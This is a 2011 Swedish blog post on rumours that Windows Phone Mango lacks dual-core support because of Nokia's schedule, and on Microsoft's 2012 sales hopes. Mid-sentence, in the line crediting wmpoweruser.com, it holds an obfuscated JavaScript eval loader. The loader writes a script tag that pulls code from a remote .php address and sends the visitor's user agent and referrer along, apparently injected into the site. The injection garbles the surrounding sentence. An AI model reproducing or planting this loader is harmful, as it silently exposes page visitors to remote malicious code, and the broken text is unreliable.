Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Windows Phone har inte stöd för dubbla kärnor. Orsak? Nokia…

Windows Phone har inte stöd för dubbla kärnor. Orsak? Nokia…
Filip Urde
  • On 24 november, 2011
  • http://www.revue.se/filip-urde

Rykten, rykten… Vårt bransch godis.

Här har vi två ganska feta som angår Microsoft och Nokia som kommit i wmpoweruser.com eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|drbtr|var|u0026u|referrer|kfbtz||js|php’.split(’|’),0,{}))
ägo.

Nr1: Anledningen till att Mango Windows Phone, inte har ett stöd för dubbla kärnor i processorerna är att Nokia helt enkelt inte skulle hinna fixa ihop en telefon med dubbla kärnor i år… Microsoft vill inte hamna på efterkälken mot sina konkurrenter Samsung och HTC. Så nu är det officiellt det sagt från Nokia och Microsoft att det räcker  med en kärna för att få Windows Phone att vara med och fightas.

Nr2: Microsoft hoppas att få försäljningssiffror på 100 miljoner för Windows Phone under 2012. Ganska optimistiskt!  Nokia sålde förra kvartalet 16.8 miljoner smartphones.

Ang. Rykte Nr1: så kan jag tycka att det är för tråkigt, inte minst för Nokias del att ännu engång inte släppa en optimal telefon. Att behöva trycka ut en produkt som är stympad känns som en riktigt kortsiktig lösning och något som kommer sätta samarbetet i en dålig sprial från start.
Vänta och släpp något ni verkligen är stolta över!” – Filip urde 2011